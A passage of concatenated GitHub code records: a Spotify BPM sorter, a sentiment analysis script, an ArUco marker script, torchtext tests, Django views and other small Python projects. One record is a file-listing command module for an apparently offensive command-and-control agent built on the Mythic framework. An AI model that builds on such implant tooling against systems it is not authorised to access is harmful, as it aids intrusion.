:')\nprint(\"Hi! We're going to log you in now.\")\ntime.sleep(2)\ntoken = spotipy.util.prompt_for_user_token(\n \"\",\n 'playlist-read-collaborative user-read-playback-state \\\n playlist-modify-public playlist-read-private \\\n playlist-modify-private streaming \\\n user-modify-playback-state',\n client_id=os.getenv('CLIENT_ID'), \n client_secret=os.getenv('CLIENT_SECRET'),\n redirect_uri='http://localhost:5710/callback/')\nif not token:\n print(\"Something went wrong while logging in.\")\n quit()\nsp = spotipy.Spotify(auth=token)\n\n# Make user select a playlist to analyse and get the tracks.\nplaylist = select_playlist(sp)\nuser_id = sp.current_user()['id']\ntracks = get_playlist_tracks(sp, playlist_id = playlist['id'])\n\n# Ask for the amount of taps for determining bpm.\nprint(\"Be aware that this tool will reset added-by-date in your spotify list.\")\ntaps = int(input(\"Taps to enter per song (8): \") or 8)\n\n# Ask for headstart in spotify songs.\nstandard_skip = int(input(\"Seconds headstart in songs (30): \") or 30)*1000\n\n# Ask track operation, averaging, replacing or skipping (if known).\ntrack_operation = ask_track_operation()\n\n# Ask if script should start automated music. \nautomated_music = ask_automated_music()\nif automated_music: device_id = select_user_device(sp)\n\n# Open bpm database (local cache).\nbpm_database = open_bpm_cache()\n\n# Start analysing the songs. \n# This is in a try_catch loop, so we don't lose analysed songs.\nprint(\"\\nWe're starting the sorting of songs now.\")\n# try: \nif True:\n \n # Loop over the index of all tracks in the playlist. \n # We delete elements from spotify, the index has to shift back.\n deleted_tracks = 0\n for track_index in range(len(tracks)):\n track_index -= deleted_tracks\n # Get current track based on index, get the known bpm if it exists.\n track = tracks[track_index]\n track_bpm_known = (\n bpm_database and track['id'] in bpm_database\n and 'bpm' in bpm_database[track['id']])\n\n # Skip if we have the track information and operation is to skip it\n if track_bpm_known and track_operation == SKIP_TRACK:\n tracks[track_index]['bpm'] = bpm_database[track['id']]['bpm']\n continue\n\n # Sleep a bit to give the user a bit of rest.\n time.sleep(0.5)\n print(\"{cur}/{total} Analysing {name} by {artist}\".format(\n cur=track_index, \n total=len(tracks), \n name=track['name'], \n artist=\", \".join(track['artists'])))\n \n # Play music if user requested it.\n if automated_music: \n sp.start_playback(device_id=device_id, uris=[track['uri']])\n sp.seek_track(position_ms=standard_skip, device_id=device_id)\n\n # Determining the bpm\n bpm_result = determine_bpm(taps)\n bpm = bpm_result['bpm']\n if bpm_result['status'] == \"DELETE\":\n deleted_tracks += 1\n sp.user_playlist_remove_specific_occurrences_of_tracks(\n user=user_id, \n playlist_id=playlist['id'], \n tracks=[{\n \"uri\": tracks[track_index]['uri'], \n \"positions\": [track_index]}])\n print(\"Track deleted. \\n\")\n del tracks[track_index]\n continue\n \n print(\"You determined this song on {} bpm.\".format(bpm))\n\n # Averaging this bpm with the one already noted.\n if track_bpm_known and track_operation == AVERAGE_TRACK:\n old_bpm = bpm_database[track['id']]\n bpm = (bpm+old_bpm) / 2\n print(\"Noted bpm was {}, wrote down {} bpm as average.\"\n .format(old_bpm, bpm))\n\n # Pause playback, note bpm and continue loop.\n print(\"\")\n sp.pause_playback(device_id=device_id)\n tracks[track_index]['bpm'] = bpm\n bpm_database[track['id']] = tracks[track_index]\n\n # Sort the playlist and submit it to Spotify.\n tracks.sort(key=lambda track: track['bpm'] if 'bpm' in track else 9999)\n sort_playlist_based_on_tracks(\n sp, \n user_id=user_id, \n playlist=playlist, \n tracks=tracks)\n\n# Catch exceptions.\n# except BaseException as e: \n# print(str(e))\n# print(\"Something went wrong while analysing.\")\n# print(\"Songs until now have been saved. Nothing is sorted.\")\n\n# Write the user's work to the disk.\n\nwith open(CACHE_FILE, \"w\") as json_file:\n json_file.write(json.dumps(bpm_database))\n\n# We're done here folks!\nprint(\"===== All {} tracks finished processing! ====\".format(len(tracks)))","repo_name":"idegeus/spotify-bpm-sorter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73317422506","text":"import re\nimport pandas as pd\nfrom wordcloud import WordCloud\nfrom matplotlib import pyplot as plt\nfrom nltk.corpus import stopwords\nfrom nltk import word_tokenize, WordNetLemmatizer, FreqDist\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\ntweets = pd.read_csv(\"tweets/dreamworks.csv\")\n\ndreamworks_content_array = pd.DataFrame(tweets, columns=['content']).to_numpy().flatten()\n\nsid = SentimentIntensityAnalyzer()\nlem = WordNetLemmatizer()\nstop_words = stopwords.words(\"english\")\nstop_words.extend(['dreamworks', 'im', 'show', 'people', 'dont', 'didnt', 'movie', 'disney', 'disneys', 'one', 'lol',\n 'know', 'cant', 'get', 'got', 'make', 'made', 'think', 'going', 'also', 'would', 'film', 'guy', '2',\n 'thing', 'go', 'see', 'say', 'said', 'thats', 'youre', 'theyre', 'us', 'animation', 'movies'])\n\nneg = []\npos = []\nneu = []\nfor i in dreamworks_content_array:\n if sid.polarity_scores(i)[\"compound\"] > 0:\n pos.append(i)\n elif sid.polarity_scores(i)[\"compound\"] == 0:\n neu.append(i)\n else:\n neg.append(i)\n\nprint(\"neg: \", len(neg))\nprint(\"neu: \", len(neu))\nprint(\"pos: \", len(pos))\n\nneg = \" \".join(neg).lower()\nneg = re.sub(r'[^a-zA-Z0-9 ]', '', neg)\ndreamworks_tokenized = word_tokenize(neg)\n\ndreamworks_filtered = []\nfor w in dreamworks_tokenized:\n if w not in stop_words:\n dreamworks_filtered.append(w)\n\ndreamworks_lem = []\nfor w in dreamworks_filtered:\n dreamworks_lem.append(lem.lemmatize(w))\n\nfdist = FreqDist(dreamworks_lem).most_common(10)\nwords = []\nfrequency = []\nfor i in fdist:\n words.append(i[0])\n frequency.append(i[1])\nwords.reverse()\nfrequency.reverse()\n\nplt.barh(words, frequency)\nplt.savefig(\"charts/DreamworksNegBarPlot\")\nplt.show()\n\nwordcloud = WordCloud(stopwords=stop_words, max_words=30, background_color=\"white\").generate(neg)\n\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\nwordcloud.to_file(\"charts/DreamworksNegWordCloud.png\")\n\npos = \" \".join(pos).lower()\npos = re.sub(r'[^a-zA-Z0-9 ]', '', pos)\ndreamworks_tokenized = word_tokenize(pos)\n\ndreamworks_filtered = []\nfor w in dreamworks_tokenized:\n if w not in stop_words:\n dreamworks_filtered.append(w)\n\ndreamworks_lem = []\nfor w in dreamworks_filtered:\n dreamworks_lem.append(lem.lemmatize(w))\n\nfdist = FreqDist(dreamworks_lem).most_common(10)\nwords = []\nfrequency = []\nfor i in fdist:\n words.append(i[0])\n frequency.append(i[1])\nwords.reverse()\nfrequency.reverse()\n\nplt.barh(words, frequency)\nplt.savefig(\"charts/DreamworksPosBarPlot\")\nplt.show()\n\nwordcloud = WordCloud(stopwords=stop_words, max_words=30, background_color=\"white\").generate(pos)\n\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\nwordcloud.to_file(\"charts/DreamworksPosWordCloud.png\")\n\n\nneu = \" \".join(neu).lower()\nneu = re.sub(r'[^a-zA-Z0-9 ]', '', neu)\ndreamworks_tokenized = word_tokenize(neu)\n\ndreamworks_filtered = []\nfor w in dreamworks_tokenized:\n if w not in stop_words:\n dreamworks_filtered.append(w)\n\ndreamworks_lem = []\nfor w in dreamworks_filtered:\n dreamworks_lem.append(lem.lemmatize(w))\n\nfdist = FreqDist(dreamworks_lem).most_common(10)\nwords = []\nfrequency = []\nfor i in fdist:\n words.append(i[0])\n frequency.append(i[1])\nwords.reverse()\nfrequency.reverse()\n\nplt.barh(words, frequency)\nplt.savefig(\"charts/DreamworksNeuBarPlot\")\nplt.show()\n\nwordcloud = WordCloud(stopwords=stop_words, max_words=30, background_color=\"white\").generate(neu)\n\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\nwordcloud.to_file(\"charts/DreamworksNeuWordCloud.png\")\n","repo_name":"tusiaa/INF_Sandra_Leman_275033","sub_path":"Projekt2/DreamworksSentiment.py","file_name":"DreamworksSentiment.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22161025125","text":"import numpy as np\nimport cv2\n\naruco = cv2.aruco\np_dict = aruco.getPredefinedDictionary(aruco.DICT_4X4_50)\n\nimg_bgr = cv2.imread(\"png/printed_ARmarker_with_coin3.jpg\")\npShape = tuple( img_bgr.shape[0:2] )\nprint( pShape )\nimg_gry = cv2.cvtColor ( img_bgr, cv2.COLOR_BGR2GRAY )\ncorners, ids, rejectedImgPoints = aruco.detectMarkers(img_bgr, p_dict) # 検出\n\n# 時計回りで左上から順にマーカーの「中心座標」を m に格納\nm = np.empty((4,2))\nfor i,c in zip( ids.ravel(), corners ):\n m[i] = c[0].mean(axis=0)\n\npRatio = float(pShape[1]) / float(pShape[0])\nwidth, height = ( 500, int(500*pRatio), ) # 変形後画像サイズ\n\nmarker_coordinates = np.float32( m )\nprint( marker_coordinates.shape )\nprint( marker_coordinates )\n\ntrans = False\nif ( trans ):\n true_coordinates = np.float32([[0,0],[width,0],[0,height],[width,height],] )\n trans_mat = cv2.getPerspectiveTransform(marker_coordinates,true_coordinates )\n img_out = cv2.warpPerspective( img_bgr, trans_mat, (width, height) )\nelse:\n img_out = img_bgr\n \ncv2.imwrite( \"png/out3.png\", img_out )\n\n\n\n\n","repo_name":"wfw-pgr/opencv2","sub_path":"test__ARmarker_by_ArUco/pyt/sample3.py","file_name":"sample3.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29425808667","text":"from typing import Tuple, List, Union\nimport torch\nimport numpy as np\nfrom transformers import AutoModel, AutoTokenizer\n\n\nclass HuggingfaceEmbeddings:\n \"\"\"A simple class to handle the sentence transformation using the specified model.\n\n Attributes:\n device (torch.device): The device used for computations, i.e., either a GPU (if available) or a CPU.\n tokenizer (transformers.AutoTokenizer): The tokenizer associated with the model.\n model (transformers.AutoModel): The transformer model used for sentence embeddings.\n \"\"\"\n\n def __init__(\n self,\n model: str = \"sentence-transformers/all-mpnet-base-v2\",\n ):\n \"\"\"Constructor method\n\n Args:\n model_name (str): The name of the model to be loaded. By default, it uses the multilingual MiniLM model.\n \"\"\"\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.tokenizer = AutoTokenizer.from_pretrained(model)\n self.model = AutoModel.from_pretrained(model).to(self.device)\n\n def mean_pooling(\n self, model_output: Tuple[torch.Tensor], attention_mask: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"Apply mean pooling on the model outputs.\n\n Args:\n model_output (torch.Tensor): The model's output.\n attention_mask (torch.Tensor): The attention mask tensor.\n\n Return:\n torch.Tensor: The mean pooled output tensor.\n \"\"\"\n token_embeddings = model_output[\n 0\n ] # First element of model_output contains all token embeddings\n input_mask_expanded = (\n attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()\n )\n return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(\n input_mask_expanded.sum(1), min=1e-9\n )\n\n def get_embedding(\n self,\n sentences: Union[str, List[str]],\n convert_to_tensor: bool = False,\n max_length: int = 128,\n ) -> Union[torch.Tensor, np.ndarray]:\n \"\"\"Encode sentences into sentence embeddings.\n\n Args:\n sentences (str | list): The sentences to be encoded. Can be either a single string or a list of strings.\n convert_to_tensor (bool, optional): If set to True, the method will return tensors, otherwise it will return numpy arrays. Defaults to False.\n max_length (int, optional): The maximum length for the sentences. Any sentence exceeding this length gets truncated. Defaults to 128.\n\n Returns:\n torch.Tensor | numpy.ndarray: The sentence embeddings. The datatype depends on the 'convert_to_tensor' parameter.\n \"\"\"\n # Ensure sentences is a list\n if not isinstance(sentences, list):\n sentences = [sentences]\n\n # Tokenize the sentences\n encoded_input = self.tokenizer(\n sentences,\n padding=\"max_length\",\n truncation=True,\n max_length=max_length,\n return_tensors=\"pt\",\n ).to(self.device)\n\n # Get the model's output\n with torch.no_grad():\n model_output = self.model(**encoded_input)\n\n # Perform pooling. In this case, mean pooling.\n sentence_embeddings = self.mean_pooling(\n model_output, encoded_input[\"attention_mask\"]\n )\n\n if convert_to_tensor:\n return sentence_embeddings\n else:\n return sentence_embeddings.cpu().numpy()\n","repo_name":"JohnSnowLabs/langtest","sub_path":"langtest/embeddings/huggingface.py","file_name":"huggingface.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":362,"dataset":"github-code","pt":"37"} +{"seq_id":"40432780250","text":"def check(guess, answer): \r\n global score \r\n still_guessing = True \r\n attempt = 0 \r\n while still_guessing and attempt < 3: \r\n if guess.lower() == answer.lower(): \r\n print(\"Correct Answer !!!\") \r\n score = score + 1 \r\n still_guessing = False \r\n \r\n else: \r\n if attempt < 2: \r\n guess = input(\"Sorry Wrong Answer, try again!\") \r\n attempt = attempt + 1 \r\n if attempt == 3: \r\n print(\"The Correct answer is \",answer ) \r\nscore = 0\r\nprint(\"Guess the Animal\")\r\nguess1 = input(\"Which animal has 3 hearts? \")\r\ncheck(guess1, \"octopus\")\r\nguess2 = input(\"Which animal has blue blood? \")\r\ncheck(guess2, \"spider\")\r\nguess3 = input(\"Which is the second smartest animal on earth after human? \")\r\ncheck(guess3, \"dolphin\")\r\nprint(\"Your Score is \"+ str(score))\r\n","repo_name":"Sonu-Dutta/Python-Assignment","sub_path":"P7_quizGame.py","file_name":"P7_quizGame.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33503009383","text":"from peewee import *\nimport random, datetime\n\nsqlite_db = SqliteDatabase('pengguna.db')\n\nclass Pengguna(Model):\n username = CharField()\n point = IntegerField()\n join_at = DateTimeField(default=datetime.datetime.now)\n\n class Meta:\n database = sqlite_db\n\nsqlite_db.connect()\nsqlite_db.create_tgitables([Pengguna], safe=True)\n\n#hitung jumlah data\n#print(Pengguna.select().count())\n\nusers = Pengguna.select().paginate(2,2)\n\nfor user in users:\n print(user.username)\n\n#users = Pengguna.select().order_by(Pengguna.point.desc())\n\n#for user in users:\n# print(user.username) + ' ' + str(user.point)\n\"\"\"\nuser = Pengguna.select().where(Pengguna.username == 'yudhi').get()\nuser.username = 'yudhirangga'\nuser.save()\n\nuser.update(point = 100).where(Pengguna.username == 'rangga').execute()\n\"\"\"\n\n'''\ndef get_rand():\n return random.randint(1,100)\n\ndata = [\n {'username': 'yudhi', 'point': get_rand()},\n {'username': 'rangga', 'point': get_rand()},\n {'username': 'boy', 'point': get_rand()},\n {'username': 'masta', 'point': get_rand()}\n]\n\nPengguna.insert_many(data).execute()\n'''","repo_name":"Yudhi151811513042/database_di_python_peewee","sub_path":"sorting data asc dan desc/pengguna.py","file_name":"pengguna.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43749135933","text":"#!/usr/bin/env python\n# -*- codnig: utf-8 -*-\n\"\"\"\nИзучаем множества, выясняем состав гласных в слове при\nпомощи множеств\n\"\"\"\nword = input('Введите слово латиницей >')\nvowels = set('aouei') # создаем множество\ni = vowels.intersection(set(word)) # ищем общие гласные в двух множествах\nfor letter in i:\n print(letter)\n","repo_name":"cherrydan/python-for-work","sub_path":"Vowels/vowels7.py","file_name":"vowels7.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34661027418","text":"from bs4 import BeautifulSoup\nimport requests\n\nr = requests.get('https://lpse.jakarta.go.id/eproc4/home')\ndata = r.text\nsoup = BeautifulSoup(data, \"html.parser\")\n\n#return author name\nfor tabel in soup.findAll('tblStatusLelang'):\n print (tabel.get)\n\n","repo_name":"davidsugianto/developer-Test","sub_path":"Scraping/scrapLPSE.py","file_name":"scrapLPSE.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40253685531","text":"class WeightedQuickUnion(object):\n def __init__(self, n):\n self.n = n\n self.ids = list(range(n))\n self.sz = [1 for i in range(n)]\n\n def root(self, i):\n while i != self.ids[i]:\n self.ids[i] = self.ids[self.ids[i]]\n i = self.ids[i]\n return i\n\n def connected(self, p, q):\n return self.root(p) == self.root(q)\n\n def union(self, p, q):\n if not self.connected(p, q):\n i = self.root(p)\n j = self.root(q)\n if self.sz[i] < self.sz[j]:\n self.ids[i] = j\n self.sz[j] += self.sz[i]\n else:\n self.ids[j] = i\n self.sz[i] += self.sz[j]\n print(list(range(self.n)))\n print(self.ids)\n print(self.sz)\n","repo_name":"tatterdemalion/playground","sub_path":"algorithms/weighted_quick_union.py","file_name":"weighted_quick_union.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31593862674","text":"import torch\nfrom torchtext import transforms\nfrom torchtext.vocab import vocab\nfrom collections import OrderedDict\n\nfrom .common.torchtext_test_case import TorchtextTestCase\nfrom .common.assets import get_asset_path\n\n\nclass TestTransforms(TorchtextTestCase):\n def _spmtokenizer(self, test_scripting):\n asset_name = \"spm_example.model\"\n asset_path = get_asset_path(asset_name)\n transform = transforms.SentencePieceTokenizer(asset_path)\n if test_scripting:\n transform = torch.jit.script(transform)\n\n actual = transform([\"Hello World!, how are you?\"])\n expected = [['▁Hello', '▁World', '!', ',', '▁how', '▁are', '▁you', '?']]\n self.assertEqual(actual, expected)\n\n actual = transform(\"Hello World!, how are you?\")\n expected = ['▁Hello', '▁World', '!', ',', '▁how', '▁are', '▁you', '?']\n self.assertEqual(actual, expected)\n\n def test_spmtokenizer(self):\n \"\"\"test tokenization on single sentence input as well as batch on sentences\"\"\"\n self._spmtokenizer(test_scripting=False)\n\n def test_spmtokenizer_jit(self):\n \"\"\"test tokenization with scripting on single sentence input as well as batch on sentences\"\"\"\n self._spmtokenizer(test_scripting=True)\n\n def _vocab_transform(self, test_scripting):\n vocab_obj = vocab(OrderedDict([('a', 1), ('b', 1), ('c', 1)]))\n transform = transforms.VocabTransform(vocab_obj)\n if test_scripting:\n transform = torch.jit.script(transform)\n actual = transform([['a', 'b', 'c']])\n expected = [[0, 1, 2]]\n self.assertEqual(actual, expected)\n\n actual = transform(['a', 'b', 'c'])\n expected = [0, 1, 2]\n self.assertEqual(actual, expected)\n\n def test_vocab_transform(self):\n \"\"\"test token to indices on both sequence of input tokens as well as batch of sequence\"\"\"\n self._vocab_transform(test_scripting=False)\n\n def test_vocab_transform_jit(self):\n \"\"\"test token to indices with scripting on both sequence of input tokens as well as batch of sequence\"\"\"\n self._vocab_transform(test_scripting=True)\n\n def _totensor(self, test_scripting):\n padding_value = 0\n transform = transforms.ToTensor(padding_value=padding_value)\n if test_scripting:\n transform = torch.jit.script(transform)\n input = [[1, 2], [1, 2, 3]]\n\n actual = transform(input)\n expected = torch.tensor([[1, 2, 0], [1, 2, 3]], dtype=torch.long)\n torch.testing.assert_close(actual, expected)\n\n input = [1, 2]\n actual = transform(input)\n expected = torch.tensor([1, 2], dtype=torch.long)\n torch.testing.assert_close(actual, expected)\n\n def test_totensor(self):\n \"\"\"test tensorization on both single sequence and batch of sequence\"\"\"\n self._totensor(test_scripting=False)\n\n def test_totensor_jit(self):\n \"\"\"test tensorization with scripting on both single sequence and batch of sequence\"\"\"\n self._totensor(test_scripting=True)\n\n def _labeltoindex(self, test_scripting):\n label_names = ['test', 'label', 'indices']\n transform = transforms.LabelToIndex(label_names=label_names)\n if test_scripting:\n transform = torch.jit.script(transform)\n actual = transform(label_names)\n expected = [0, 1, 2]\n self.assertEqual(actual, expected)\n\n with self.assertRaises(RuntimeError):\n transform(['OOV'])\n\n transform = transforms.LabelToIndex(label_names=label_names, sort_names=True)\n if test_scripting:\n transform = torch.jit.script(transform)\n actual = transform(label_names)\n expected = [2, 1, 0]\n self.assertEqual(actual, expected)\n\n actual = transform(\"indices\")\n expected = 0\n self.assertEqual(actual, expected)\n\n asset_name = \"label_names.txt\"\n asset_path = get_asset_path(asset_name)\n transform = transforms.LabelToIndex(label_path=asset_path)\n if test_scripting:\n transform = torch.jit.script(transform)\n actual = transform(label_names)\n expected = [0, 1, 2]\n self.assertEqual(actual, expected)\n\n def test_labeltoindex(self):\n \"\"\"test labe to ids on single label input as well as batch of labels\"\"\"\n self._labeltoindex(test_scripting=False)\n\n def test_labeltoindex_jit(self):\n \"\"\"test labe to ids with scripting on single label input as well as batch of labels\"\"\"\n self._labeltoindex(test_scripting=True)\n\n def _truncate(self, test_scripting):\n max_seq_len = 2\n transform = transforms.Truncate(max_seq_len=max_seq_len)\n if test_scripting:\n transform = torch.jit.script(transform)\n\n input = [[1, 2], [1, 2, 3]]\n actual = transform(input)\n expected = [[1, 2], [1, 2]]\n self.assertEqual(actual, expected)\n\n input = [1, 2, 3]\n actual = transform(input)\n expected = [1, 2]\n self.assertEqual(actual, expected)\n\n input = [[\"a\", \"b\"], [\"a\", \"b\", \"c\"]]\n actual = transform(input)\n expected = [[\"a\", \"b\"], [\"a\", \"b\"]]\n self.assertEqual(actual, expected)\n\n input = [\"a\", \"b\", \"c\"]\n actual = transform(input)\n expected = [\"a\", \"b\"]\n self.assertEqual(actual, expected)\n\n def test_truncate(self):\n \"\"\"test truncation on both sequence and batch of sequence with both str and int types\"\"\"\n self._truncate(test_scripting=False)\n\n def test_truncate_jit(self):\n \"\"\"test truncation with scripting on both sequence and batch of sequence with both str and int types\"\"\"\n self._truncate(test_scripting=True)\n","repo_name":"cuikunyu/text","sub_path":"test/test_transforms.py","file_name":"test_transforms.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"37648891184","text":"# MICROSOFT\n\"\"\"\n SOLVED -- LEETCODE#941\n Given an array of heights,\n determine whether the array forms a \"mountain\" pattern.\n A mountain pattern goes up and then down.\n Like\n /\\\n / \\\n / \\\n\"\"\"\n\n\nclass Solution(object):\n def validMountainArray(self, arr):\n # Time: O(n) Space: O(1)\n n = len(arr)\n if n < 3:\n return False\n mxfound = False\n\n for i in range(1, n):\n if mxfound:\n if arr[i] >= arr[i - 1]:\n return False\n else:\n if arr[i] <= arr[i - 1]:\n return False\n elif i + 1 < n and arr[i] > arr[i + 1]:\n mxfound = True\n\n return mxfound\n\n\nprint(Solution().validMountainArray([1, 2, 3, 2, 1]))\n# True\n\nprint(Solution().validMountainArray([1, 2, 3]))\n# False\n","repo_name":"SuchismitaDhal/Solutions-dailyInterviewPro","sub_path":"2020/07-July/07.06.py","file_name":"07.06.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4025830674","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import redirect\nfrom django.template import loader\nfrom .models import Content, SubWork, Work\nfrom .Form.contactForm import ContactForm\n# Create your views here.\n\n\ndef Index(request):\n about_sites = Content.objects.filter(contents_type=\"SITE\").first()\n about_me = Content.objects.filter(contents_type=\"PROFILE\").first()\n skills = Content.objects.filter(contents_type=\"SKILLS\").first()\n skill_db = skills.related_content.filter(type=\"DB\").order_by(\"name\")\n skill_language = skills.related_content.filter(type=\"Language\").order_by(\"name\")\n skill_framework = skills.related_content.filter(type=\"Framework\").order_by(\"name\")\n works = Content.objects.filter(contents_type=\"WORKS\").first()\n work_contents = works.work_content.all()\n template = loader.get_template('myprofile/index.html')\n\n # 問い合わせフォーム\n contact_form = ContactForm()\n isSuccess = False\n if request.method == \"POST\":\n contact_form = RegisterContact(request)\n\n # 水玉用\n for_range_li = [i for i in range(15)]\n\n # テーブルのレイアウトをそろえる用の変数\n skill_max_count = max([len(skill_db), len(skill_language), len(skill_framework)])\n for_range_skill_db = [i for i in range(skill_max_count - len(skill_db))]\n for_range_skill_language = [i for i in range(skill_max_count - len(skill_language))]\n for_range_skill_framework = [i for i in range(skill_max_count - len(skill_framework))]\n\n context = {\n 'about_sites': about_sites,\n 'about_me': about_me,\n 'skills': skills,\n 'skill_db': skill_db,\n 'skill_language': skill_language,\n 'skill_framework': skill_framework,\n 'works': works,\n 'work_contents': work_contents,\n 'for_range_skill_db': for_range_skill_db,\n 'for_range_skill_language': for_range_skill_language,\n 'for_range_skill_framework': for_range_skill_framework,\n 'for_range_li': for_range_li,\n 'contact_form': contact_form,\n 'isSuccess': isSuccess,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef WorkDetail(request, work_id):\n if request.method == 'GET':\n work = Work.objects.filter(pk=work_id)\n work_detail = SubWork.objects.filter(work_id=work[0].pk)\n img_url_root = work[0].top_image.url[:work[0].top_image.url.find(\"/\", 1) + 1]\n work = list(work.values())\n work_detail = list(work_detail.values())\n context = {\n 'work': work[0],\n 'img_url_root': img_url_root,\n 'work_detail': work_detail[0],\n }\n return JsonResponse(context)\n\n\ndef RegisterContact(request):\n if request.method == \"POST\":\n contact_form = ContactForm(request.POST)\n if contact_form.is_valid():\n post = contact_form.save()\n post.author = request.user\n post.save()\n contact_form.SendContactMail()\n return ContactForm()\n return contact_form\n","repo_name":"ryunoooosuke/MySite","sub_path":"myprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22096884832","text":"from setuptools import setup\n\npackage_name = 'slide_show'\n\nsetup(\n name=package_name,\n version='0.1.0',\n packages=['slide_show'],\n data_files=[\n ('share/ament_index/resource_index/packages', ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n author='Shane Loretz',\n author_email='sloretz@openrobotics.org',\n maintainer='Shane Loretz',\n maintainer_email='sloretz@openrobotics.org',\n keywords=['ROS'],\n classifiers=[\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n ],\n description='Publishes images from the file system.',\n license='Apache License, Version 2.0',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'slide_show = slide_show:main',\n ],\n },\n)\n","repo_name":"ros2/slide_show","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21588905171","text":"from mythic_payloadtype_container.MythicCommandBase import *\nfrom mythic_payloadtype_container.MythicRPC import *\n\nimport json\n\n\nclass LsArguments(TaskArguments):\n def __init__(self, command_line, **kwargs):\n super().__init__(command_line, **kwargs)\n\n self.args = [\n CommandParameter(\n name=\"path\",\n type=ParameterType.String,\n parameter_group_info=[ParameterGroupInfo(required=False)],\n description=\"Path of file or folder on the current system to list\",\n )\n ]\n\n async def parse_arguments(self):\n\n if len(self.command_line) > 0:\n if self.command_line[0] == \"{\":\n temp_json = json.loads(self.command_line)\n\n if \"host\" in temp_json:\n self.add_arg(\"path\", temp_json[\"path\"] + \"/\" + temp_json[\"file\"])\n self.add_arg(\"file_browser\", True, type=ParameterType.Boolean)\n else:\n self.add_arg(\"path\", temp_json[\"path\"])\n else:\n self.add_arg(\"path\", self.command_line)\n else:\n self.add_arg(\"path\", \".\")\n\n\nclass LsCommand(CommandBase):\n cmd = \"ls\"\n needs_admin = False\n help_cmd = \"ls [/path/to/folder/or/file]\"\n description = \"Get a file listing\"\n version = 1\n author = \"@ArchiMoebius\"\n attackmapping = [\"T1083\"]\n supported_ui_features = [\"file_browser:list\"]\n is_file_browse = True\n argument_class = LsArguments\n browser_script = []\n attributes = CommandAttributes(\n supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],\n )\n\n async def create_tasking(self, task: MythicTask) -> MythicTask:\n\n if task.args.has_arg(\"file_browser\") and task.args.get_arg(\"file_browser\"):\n task.display_params = f'{task.callback.host}:{task.args.get_arg(\"path\")}'\n else:\n task.display_params = task.args.get_arg(\"path\")\n\n return task\n\n async def process_response(self, response: AgentResponse):\n pass\n","repo_name":"ArchiMoebius/zippy","sub_path":"Payload_Type/zippy/mythic/agent_functions/ls.py","file_name":"ls.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23066056803","text":"\nclass Question:\n\n OPERATOR_SYMBOLS = {\n \"+\": \"+\",\n \"-\": \"-\",\n \"*\": \"×\",\n \"/\": \"÷\",\n }\n\n def __init__(self, operator, operand_1, operand_2, answer):\n \n self.operator = operator\n\n self.operand_1 = operand_1\n self.operand_2 = operand_2\n\n self.answer = answer\n\n @property\n def operator_symbol(self):\n return self.OPERATOR_SYMBOLS[self.operator]\n\n def __str__(self, include_answer:bool = False):\n s = f\"{self.operand_1} {self.operator_symbol} {self.operand_2}\"\n if include_answer:\n s += f\" = {self.answer}\"\n return s\n\n\n def check_answer(self, answer_guess:int):\n return answer_guess == self.answer\n\n","repo_name":"mattyhempstead/flash-trainer","sub_path":"src/Question.py","file_name":"Question.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15222845480","text":"from itertools import combinations\nimport sys\n\nn = int(sys.stdin.readline().strip())\ns = []\nfor _ in range(n):\n s.append(list(map(int, sys.stdin.readline().strip().split())))\nmin = 987654321\nteams = list(combinations(list(range(n)),n//2))\nfor team in teams:\n start = team[:]\n link = list(set(list(range(n)))-set(start))\n temp = 0\n for first in start:\n for second in 